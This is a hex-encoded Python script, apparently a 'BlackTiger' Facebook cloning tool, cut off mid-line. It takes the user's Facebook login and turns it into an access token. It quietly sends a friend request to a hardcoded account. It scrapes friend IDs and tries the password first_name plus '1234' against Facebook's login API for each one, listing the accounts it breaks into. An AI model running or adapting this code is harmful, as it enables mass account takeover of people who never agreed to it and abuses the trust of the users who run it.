222220A0A6465662074696B28293A0A09746974696B203D205B272E202020272C272E2E2020272C272E2E2E20275D0A09666F72206F20696E20746974696B3A0A09097072696E7428225C725C7831625B313B39336D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29
688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E393925205C7831625B313B39336D222B6F292C3B7379732E7374646F75742E666C75736828293B74696D652E736C65657028302E31290A0A0A6261636B203D20300A626572686173696C203D205B5D0A63656B706F696E74203D205B5D0A6F6B73203D205B5D0A6964203D205B5D0A6C69737467727570203D205B5D0A76756C6E6F74203D20225C3033335B33316D4E6F742056756C6E220A76756C6E203D20225C3033335B33326D56756C6E220A0A6F732E73797374656D2822636C65617222290A7072696E7420202222220A5C3033335B313B39316DE29480E29480E29480E29684E29680E29680E29680E29680E29680E29480E29480E29480E29684E29688E29680E29680E29680E29688E296840A5C3033335B313B39326DE29480E29480E29690E29684E29684E29684E29684E29684E29684E29684E29684E29688E29688E2968CE29680E29684E29680E29690E29688E296880A5C3033335B313B39336DE29480E29480E29690E29692E29692E29692E29692E29692E29692E29692E29692E29688E29688E29688E2968CE29680E29690E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E2968CE29692E29693E29692E29692E29692E29692E29693E29692E29688E29688E2968CE29680E29690E29688E296880A5C3033335B313B39356DE29480E29480E29480E2968CE29693E29690E29680E29680E29680E29680E2968CE29693E29480E29680E29680E29680E29680E2968020200A5C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A5C3033335B313B39376DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A5C3033335B313B39316DE29480E29480E29480E29480E29480E29688E29480E29684E29680E29688E29480E29480E29688E29680E29684E29480E29688E29480E29480E29480E29480E294805C3033335B313B39376DE29480E29480E29480E29480E29480E29688E29480E29684E29680E29688E29480E29480E29688E29680E29684E29480E29688E29480E29480E29480E29480E29480200A5C3033335B313B39316DE29480E29480E29480E29
480E29690E2968CE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29690E2968CE29480E29480E29480E294805C3033335B313B39376DE29480E29480E29480E29480E29690E2968CE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29690E2968CE29480E29480E29480E294800A5C3033335B313B39316DE29480E29480E29480E29480E29688E2968CE29680E29684E29480E29480E29684E29684E29480E29480E29684E29680E29690E29688E29480E29480E29480E294805C3033335B313B39376DE29480E29480E29480E29480E29688E2968CE29680E29684E29480E29480E29684E29684E29480E29480E29684E29680E29690E29688E29480E29480E29480E294800A5C3033335B313B39316DE29480E29480E29480E29690E29688E29688E29480E29480E29680E29680E29480E29480E29680E29680E29480E29480E29688E29688E2968CE29480E29480E294805C3033335B313B39376DE29480E29480E29480E29690E29688E29688E29480E29480E29680E29680E29480E29480E29680E29680E29480E29480E29688E29688E2968CE29480E29480E294800A5C3033335B313B39316DE29480E29480E29684E29688E29688E29688E29688E29684E29480E29480E29690E2968CE29480E29480E29684E29688E29688E29688E29688E29684E29480E294805C3033335B313B39376DE29480E29480E29684E29688E29688E29688E29688E29684E29480E29480E29690E2968CE29480E29480E29684E29688E29688E29688E29688E29684E29480E29480202020200A5C3033335B313B39376DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A220202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A5C3033335B313B39316D205F5F5F5F20205F5F20202020205F5F202020205F5F5F20205F5F205F202020205F5F5F5F20205F5F20205F5F5F20205F5F5F5F20205F5F5F5F200A5C3033335B313B39326D2820205F205C282020292020202F205F5C20202F205F5F292820202F20292020285F20205F29282020292F205F5F292820205F5F292
820205F205C0A5C3033335B313B39336D2029205F20282F20285F2F5C2F202020205C2820285F5F2020292020282020202020292820202029282820285F205C2029205F292020292020202F0A5C3033335B313B39346D285F5F5F5F2F5C5F5F5F5F2F5C5F2F5C5F2F205C5F5F5F29285F5F5C5F29202020285F5F2920285F5F295C5F5F5F2F285F5F5F5F29285F5F5C5F290A5C3033335B313B39356D205F5F5F5F20205F5F5F5F20205F5F5F5F2020205F5F20205F5F5F5F2020205F5F5F2020205F5F202020205F5F5F202020202020202020202020200A5C3033335B313B39366D2820205F5F292820205F205C2820205F205C202F20205C2820205F205C202F205F205C202F20205C20202F205F205C2020202020202020202020200A5C3033335B313B39376D2029205F292020292020202F20292020202F2820204F2029292020202F285F5F202028282020302029285F5F2020282020202020202020202020200A5C3033335B313B39316D285F5F5F5F29285F5F5C5F29285F5F5C5F29205C5F5F2F285F5F5C5F292020285F5F2F205C5F5F2F202020285F5F2F2020202020202020202020200A5C3033335B313B39326DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A205C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A202222220A436F7272656374557365726E616D65203D2022426C61636B220A436F727265637450617373776F7264203D20225469676572220A0A6C6F6F70203D202774727565270A7768696C6520286C6F6F70203D3D20277472756527293A0A20202020757365726E616D65203D207261775F696E70757428225C3033335B313B39316D5B2B5D205C3033335B313B39316D205C7831625B313B39316D546F6F6C20557365726E616D65205C7831625B313B39316D3A205C7831625B313B39376D22290A2020202069662028757365726E616D65203D3D20436F7272656374557365726E616D65293A0A202020200970617373776F7264203D207261775F696E70757428225C3033335B313B39316D5B2B5D205C3033335B313B39316D205C7831625B313B39316D546F6F6C2050617373776F7264205C7831625B313B39316D3A205C7831625B313B39376D22290
A20202020202020206966202870617373776F7264203D3D20436F727265637450617373776F7264293A0A2020202020202020202020207072696E7420224C6F6767656420696E207375636365737366756C6C792061732022202B20757365726E616D6520234465763A426C61636B54696765722D4572726F723430340A092020202074696D652E736C6565702832290A2020202020202020202020206C6F6F70203D202766616C7365270A2020202020202020656C73653A0A2020202020202020202020207072696E7420225C3033335B313B39376D57726F6E672050617373776F7264220A2020202020202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F307357304B3173516B6B4927290A20202020656C73653A0A20202020202020207072696E7420225C3033335B313B39376D57726F6E6720557365726E616D65220A20202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F307357304B3173516B6B4927290A0A2323232323204C4943454E53452023232323230A233D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D230A646566206C6973656E736928293A0A096F732E73797374656D2827636C65617227290A096C6F67696E28290A232323236C6F67696E2323232323232323230A646566206C6F67696E28293A0A096F732E73797374656D2827636C65617227290A097072696E74206C6F676F0A097072696E7420225C3033335B313B39316D5B315D5C3033335B313B34376D5C3033335B313B33316D4C6F67696E20576974682046616365626F6F6B20202020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39326D5B325D5C3033335B313B34376D5C3033335B313B33316D4C6F67696E205769746820546F6B656E20202020202020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39336D5B335D5C3033335B313B34376D5C3033335B313B33316D446F776E6C6F616420546F6B656E204170702020202020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39346D5B345D5C3033335B313B34376D5C3033335B313B33316D53756273637269626520596F7554756265204368616E6E656C20202020202020205C3033335B313B306D220A202020202020202074696D6
52E736C65657028302E3035290A097072696E7420225C3033335B313B39356D5B355D5C3033335B313B34376D5C3033335B313B33316D4A6F696E2057686174736170702067726F757020466F722048656C7020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39366D5B305D5C3033335B313B34376D5C3033335B313B33316D4578697420202020202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A0970696C69685F6C6F67696E28290A0A6465662070696C69685F6C6F67696E28293A0A097065616B203D207261775F696E70757428225C6E5C3033335B313B39376D5B2B5D205C3033335B303B33316D53656C656374204F7074696F6E3A205C3033335B313B39316D22290A096966207065616B203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C69685F6C6F67696E28290A09656C6966207065616B203D3D2231223A0A09096C6F67696E3128290A2020202020202020656C6966207065616B203D3D2232223A0A092020202020202020746F6B656E7A28290A2020202020202020656C6966207065616B203D3D2233223A0A0920202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F6D2E61706B707572652E636F6D2F6765742D6163636573732D746F6B656E2F636F6D2E70726F69742E74686169736F6E2E676574616363657373746F6B656E66616365626F6F6B2F646F776E6C6F61642F312D41504B3F66726F6D3D76657273696F6E7325324676657273696F6E27290A0920202020202020206C6F67696E28290A2020202020202020656C6966207065616B203D3D2234223A0A0920202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F307357304B3173516B6B4927290A0920202020202020206C6F67696E28290A2020202020202020656C6966207065616B203D3D2235223A0A0920202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F636861742E77686174736170702E636F6D2F446D4164704573676A6872395A357A537A7757756A362027290A202020202020202020202020202020206C6F67696E28290A09656C6966207065616B203D3D2230223A0A09096B656C75617228290A2020202020202020656C73653A0A09097072696E74225C3033335B313B39316D5B215D2057726F6E6720696E707574220A09096B656C756172282
90A0A646566206C6F67696E3128293A0A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B6574203D206F70656E28276C6F67696E2E747874272C277227290A09096D656E752829200A0965786365707420284B65794572726F722C494F4572726F72293A0A09096F732E73797374656D2827636C65617227290A2020202020202020202020202020202074696D652E736C65657028302E3035290A09097072696E74206C6F676F202020202020202020202020202020200A09097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A09097072696E7428275C3033335B313B39376D5B2B5D5C3033335B313B34376D5C3033335B313B33316D4C4F47494E20574954482046414345424F4F4B5C7831625B313B39376D205C3033335B313B306D2720290A09097072696E742827092720290A09096964203D207261775F696E70757428275C3033335B313B39376D5B215D205C7831625B313B39376D4E756D6265722F456D61696C5C7831625B313B39376D3A205C7831625B313B39376D27290A0909707764203D207261775F696E70757428275C3033335B313B39376D5B2B5D205C7831625B313B39376D50617373776F72645C7831625B313B39376D202020203A205C7831625B313B39376D27290A090974696B28290A09097472793A0A09090962722E6F70656E282768747470733A2F2F6D2E66616365626F6F6B2E636F6D27290A0909657863657074206D656368616E697A652E55524C4572726F723A0A0909097072696E74225C6E5C7831625B313B39376D5468657265206973206E6F20696E7465726E657420636F6E6E656374696F6E220A0909096B656C75617228290A090962722E5F666163746F72792E69735F68746D6C203D20547275650A090962722E73656C6563745F666F726D286E723D30290A090962722E666F726D5B27656D61696C275D203D2069640A090962722E666F726D5B2770617373275D203D207077640A090962722E7375626D697428290A090975726C203D2062722E67657475726C28290A090969662027736176652D6465766963652720696E2075726C3A0A0909097472793A0A090909097369673D20276170695F6B65793D383832613834393033363164613938373032626639376130323164646331346463726564656E7469616C735F747970653D70617373776F7264656D61696C3D272B69642B27666F726D61743D4A534F4E67656E65726174655F6D616368696E655F69643D3167656E65726174655F73657373696F6E5F636F6
F6B6965733D316C6F63616C653D656E5F55536D6574686F643D617574682E6C6F67696E70617373776F72643D272B7077642B2772657475726E5F73736C5F7265736F75726365733D30763D312E303632663863653966373462313266383463313233636332333433376134613332270A0909090964617461203D207B226170695F6B6579223A223838326138343930333631646139383730326266393761303231646463313464222C2263726564656E7469616C735F74797065223A2270617373776F7264222C22656D61696C223A69642C22666F726D6174223A224A534F4E222C202267656E65726174655F6D616368696E655F6964223A2231222C2267656E65726174655F73657373696F6E5F636F6F6B696573223A2231222C226C6F63616C65223A22656E5F5553222C226D6574686F64223A22617574682E6C6F67696E222C2270617373776F7264223A7077642C2272657475726E5F73736C5F7265736F7572636573223A2230222C2276223A22312E30227D0A09090909783D686173686C69622E6E657728226D643522290A09090909782E75706461746528736967290A09090909613D782E68657864696765737428290A09090909646174612E757064617465287B27736967273A617D290A0909090975726C203D202268747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E706870220A09090909723D72657175657374732E6765742875726C2C706172616D733D64617461290A090909097A3D6A736F6E2E6C6F61647328722E74657874290A09090909756E696B657273203D206F70656E28226C6F67696E2E747874222C20277727290A09090909756E696B6572732E7772697465287A5B276163636573735F746F6B656E275D290A09090909756E696B6572732E636C6F736528290A090909097072696E7420275C3033335B313B34376D5C3033335B313B39316D426C61636B5F5469676572204C6F67696E205375636365737366756C5C3033335B313B306D270A090909096F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F5F6E72336734696D56784927290A0909090972657175657374732E706F7374282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6D6574686F643D706F737426756964733D6777696D75736133266163636573735F746F6B656E3D272B7A5B276163636573735F746F6B656E275D290A090909096D656E7528290A0909096578636570742072657175657374732E657863657074696F6E732E436F6E6E656374696F6E4572726F723A0A090909097072696E74225C6E5C7831625B313B39376D546865726
5206973206E6F20696E7465726E657420636F6E6E656374696F6E220A090909096B656C75617228290A090969662027636865636B706F696E742720696E2075726C3A0A0909097072696E7428225C6E5C7831625B313B39376DE288864350E288862043726561742041204E6577204163636F756E7422290A0909096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09090974696D652E736C6565702831290A0909096B656C75617228290A0909656C73653A0A0909097072696E7428225C6E5C7831625B313B39376D50617373776F72642F456D61696C2069732077726F6E6722290A0909096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09090974696D652E736C6565702831290A0909096C6F67696E28290A0909090A646566206D656E7528293A0A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B65743D6F70656E28276C6F67696E2E747874272C277227292E7265616428290A0965786365707420494F4572726F723A0A09096F732E73797374656D2827636C65617227290A09097072696E74225C7831625B313B39346D546F6B656E20696E76616C6964220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A097472793A0A09096F203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D272B746F6B6574290A090961203D206A736F6E2E6C6F616473286F2E74657874290A09096E616D61203D20615B276E616D65275D0A09096964203D20615B276964275D0A2020202020202020202020202020202074203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F73756273637269626572733F6163636573735F746F6B656E3D27202B20746F6B6574290A2020202020202020202020202020202062203D206A736F6E2E6C6F61647328742E74657874290A20202020202020202020202020202020737562203D2073747228625B2773756D6D617279275D5B27746F74616C5F636F756E74275D290A09657863657074204B65794572726F723A0A09096F732E73797374656D2827636C65617227290A09097072696E74225C3033335B313B39376DE288864350E2888643726561742041204E6577204163636F756E74220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A096578636570742072657175657374732E6
57863657074696F6E732E436F6E6E656374696F6E4572726F723A0A09097072696E74225C7831625B313B39346D5468657265206973206E6F20696E7465726E657420636F6E6E656374696F6E220A09096B656C75617228290A096F732E73797374656D2822636C656172222920234465763A426C61636B54696765722D4572726F723430340A097072696E74206C6F676F0A097072696E7420225C3033335B313B33376D5B215D5C3033335B313B39316D204C6F6767656420696E205573657220496E666F726D6174696F6E5C3033335B313B39326D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B33376D5BE280A25D5C3033335B313B39316D204E616D655C3033335B313B39336D3A5C3033335B313B39316D222B6E616D612B225C3033335B313B39336D202020202020202020202020202020220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B33376D5BE280A25D5C3033335B313B39316D2049445C3033335B313B39336D3A5C3033335B313B39316D222B69642B225C7831625B313B39336D2020202020202020202020202020220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A097072696E7420225C3033335B313B39326D5B315D5C3033335B313B34376D5C3033335B313B33316D5374617274204861636B696E6720202020202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39336D5B325D5C3033335B313B34376D5C3033335B313B33316D4944204E6F7420466F756E642050726F626C656D20536F6C76652020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39346D5B335D5C3033335B313B34376D5C3033335B313B33316D526573742F55706461746520426C61636B5F546967657220202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39356D5B305D5C3033335B313B34376D5C3033335B313B33316D4578697420202020202020202020202020202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302
E3035290A0970696C696828290A0A0A6465662070696C696828293A0A09756E696B657273203D207261775F696E70757428225C6E5C3033335B313B33316D53656C656374204F7074696F6E3A205C3033335B313B39316D22290A09696620756E696B657273203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A2020202020202020656C696620756E696B657273203D3D2231223A09090A092020202020202020737570657228290A09656C696620756E696B657273203D3D2232223A0A09096F732E73797374656D28277864672D6F70656E2068747470733A2F2F636F6D6D656E747069636B65722E636F6D2F66696E642D66616365626F6F6B2D69642E70687027290A0920202020202020206D656E7528290A09656C696620756E696B657273203D3D2233223A0A09096F732E73797374656D2827636C65617227290A09097072696E74206C6F676F0A09097072696E7420225C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E5C3033335B313B39316D4461746152657365745C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E220A202020202020202020202020202020206A616C616E28275C3033335B313B39316D3D31302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39326D3D3D32302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D3D3D3D33302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D34302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39356D3D3D3D3D3D35302522290A202020202020202020202020202020206A616C616E28225C3033335B313B39366D3D3D3D3D3D3D36302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39376D3D3D3D3D3D3D3D37302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39366D3D3D3D3D3D3D3D3D38302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39356D3D3D3D3D3D3D3D3D3D39302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D3D3D3D3D3D3D3130302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D436C6F6E696E67204461746120526573657420616E642075706461746520627920426C61636B5F546967657227290A09096F732E73797374656D28276769742070756C6C206F726
967696E206D617374657227290A09097261775F696E70757428275C6E5C7831625B313B39316D5B205C7831625B313B39376D4261636B205C7831625B313B39316D5D27290A0920202020202020206D656E75282909090A09656C696620756E696B657273203D3D2230223A0A09096A616C616E2827546F6B656E2052656D6F76656427290A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09096B656C75617228290A09656C73653A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A6465662070696C696828293A0A09756E696B657273203D207261775F696E70757428225C6E5C3033335B313B39316D43686F6F736520616E204F7074696F6E3A205C3033335B313B39376D22290A09696620756E696B657273203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A09656C696620756E696B657273203D3D2231223A0A0909737570657228290A09656C696620756E696B657273203D3D2232223A0A09096F732E73797374656D28277864672D6F70656E2068747470733A2F2F636F6D6D656E747069636B65722E636F6D2F66696E642D66616365626F6F6B2D69642E70687027290A0920202020202020206D656E7528290A09656C696620756E696B657273203D3D2233223A0A09096F732E73797374656D2827636C65617227290A09097072696E74206C6F676F0A09097072696E7420225C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E5C3033335B313B39316D4461746152657365745C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E220A202020202020202020202020202020206A616C616E28275C3033335B313B39316D3D31302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39326D3D3D32302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D3D3D3D33302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D34302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39356D3D3D3D3D3D35302522290A202020202020202020202020202020206A616C616E28225C3033335B313B39366D3D3D3D3D3D3D36302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39376D3D3D3D3D3D3D3D37302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39366D3D3D3D3D3D3D3D3D38302527290
A202020202020202020202020202020206A616C616E28275C3033335B313B39356D3D3D3D3D3D3D3D3D3D39302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D3D3D3D3D3D3D3130302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D436C6F6E696E67204461746120526573657420616E642075706461746520627920426C61636B5F546967657227290A09096F732E73797374656D28276769742070756C6C206F726967696E206D617374657227290A09097261775F696E70757428275C6E5C7831625B313B39316D5B205C7831625B313B39376D4261636B205C7831625B313B39316D5D27290A0920202020202020206D656E75282909090A09656C696620756E696B657273203D3D2230223A0A09096A616C616E2827546F6B656E2052656D6F76656427290A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09096B656C75617228290A09656C73653A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A0A0A64656620737570657228293A0A09676C6F62616C20746F6B65740A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B65743D6F70656E28276C6F67696E2E747874272C277227292E7265616428290A0965786365707420494F4572726F723A0A09097072696E74225C7831625B313B39316D546F6B656E20696E76616C6964220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A096F732E73797374656D2827636C65617227290A097072696E74206C6F676F0A097072696E7420225C3033335B313B39376D5B315D5C3033335B313B34376D5C3033335B313B39316D436C6F6E652046726F6D20467269656E64204C697374202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39376D5B325D5C3033335B313B34376D5C3033335B313B39316D436C6F6E652046726F6D205075626C6963204964205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39376D5B305D5C3033335B313B34376D5C3033335B313B39316D4261636B2020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A0970696C69685F737570657228290A0A6465662070696C69685F737570657228293A0A097065616B203D207261775F696E70757
428225C6E5C3033335B313B39376D5B2B5D5C3033335B313B39316D53656C656374204F7074696F6E3A205C3033335B313B39376D22290A096966207065616B203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C69685F737570657228290A09656C6966207065616B203D3D2231223A0A09096F732E73797374656D2827636C65617227290A09097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A09097072696E74206C6F676F0A09096A616C616E28275C3033335B313B39376D5B2B5D5C3033335B313B39316D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E3939255C3033335B313B39376D3A2D3A27290A090972203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6163636573735F746F6B656E3D222B746F6B6574290A09097A203D206A736F6E2E6C6F61647328722E74657874290A0909666F72207320696E207A5B2764617461275D3A0A09090969642E617070656E6428735B276964275D290A09656C6966207065616B203D3D2232223A0A09096F732E73797374656D2827636C65617227290A09097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A09097072696E74206C6F676F0A0909696474203D207261775F696E70757428225C3033335B313B39376D5B2B5D5C3033335B313B39316D456E7465722049445C3033335B313B39376D3A205C3033335B313B39376D22290A09097472793A0A0909096A6F6B203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B6964742B223F6163636573735F746F6B656E3D222B746F6B6574290A0909096F70203D206A736F6E2E6C6F616473286A6F6B2E74657874290A0909097072696E74225C3033335B313B39376D5B2B5D5C3033335B313B39316D4E616D655C3033335B313B39376D3A5C3033335B313B39376D20222B6F705B226E616D65225D0A0909657863657074204B65794572726F723A0A0909097072696E74225C3033335B313B39376D5
B2B5D5C7831625B313B39316D4944204E6F7420466F756E6421220A0909097261775F696E70757428225C6E5C3033335B313B39366D5B5C3033335B313B39376D4261636B5C3033335B313B39366D5D22290A090909737570657228290A09097072696E74225C3033335B313B39376D5B2B5D5C3033335B313B39316D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E3939255C3033335B313B39376D3A2D3A220A090972203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B6964742B222F667269656E64733F6163636573735F746F6B656E3D222B746F6B6574290A09097A203D206A736F6E2E6C6F61647328722E74657874290A0909666F72206920696E207A5B2764617461275D3A0A09090969642E617070656E6428695B276964275D290A09656C6966207065616B203D3D2230223A0A09096D656E7528290A09656C73653A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C69685F737570657228290A090A097072696E7420225C3033335B313B39376D5B2B5D5C3033335B313B39316D546F74616C204163636F756E74735C3033335B313B39376D3A205C3033335B313B39376D222B737472286C656E28696429290A09746974696B203D205B272E202020272C272E2E2020272C272E2E2E20275D0A09666F72206F20696E20746974696B3A0A09097072696E7428225C725C3033335B313B39376D5B2B5D5C3033335B313B33316D4861636B696E6720486173204265656E20537461727465645C3033335B313B39376D222B6F292C3B7379732E7374646F75742E666C75736828293B74696D652E736C65657028302E3035290A097072696E7420225C6E5C3033335B313B39376D5B2B5D5C7831625B313B33316D53746F702050726F63657373205072657373204354524C2B5A220A097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A20090A0909090A09646566206D61696E28617267293A0A0909676C6F62616C206F6B730A090975736572203D206172670A09097472793A0A0909096F732E6D6B64697228276F757427290A0909657863657074204F534572726F723A0A0909097061737320234465763A426C61636B54696765722D4572726F723430340A09097472793A09090
9090909090909090909090A09090961203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F272B757365722B272F3F6163636573735F746F6B656E3D272B746F6B6574290909090909090909090909090A09090962203D206A736F6E2E6C6F61647328612E74657874290909090909090909090909090A0909097061737331203D20625B2766697273745F6E616D65275D202B202731323334270909090909090909090909090A09090964617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737331292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393966623631666364376161306334346635386635323265663622290909090909090909090909090A09090971203D206A736F6E2E6C6F61642864617461290909090909090909090909090A090909696620276163636573735F746F6B656E2720696E20713A0A0909090978203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A090909097A203D206A736F6E2E6C6F61647328782E74657874290A090909097072696E7420275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D2709090909090909090909090A090909097072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D09090909090909090909090A090909097072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376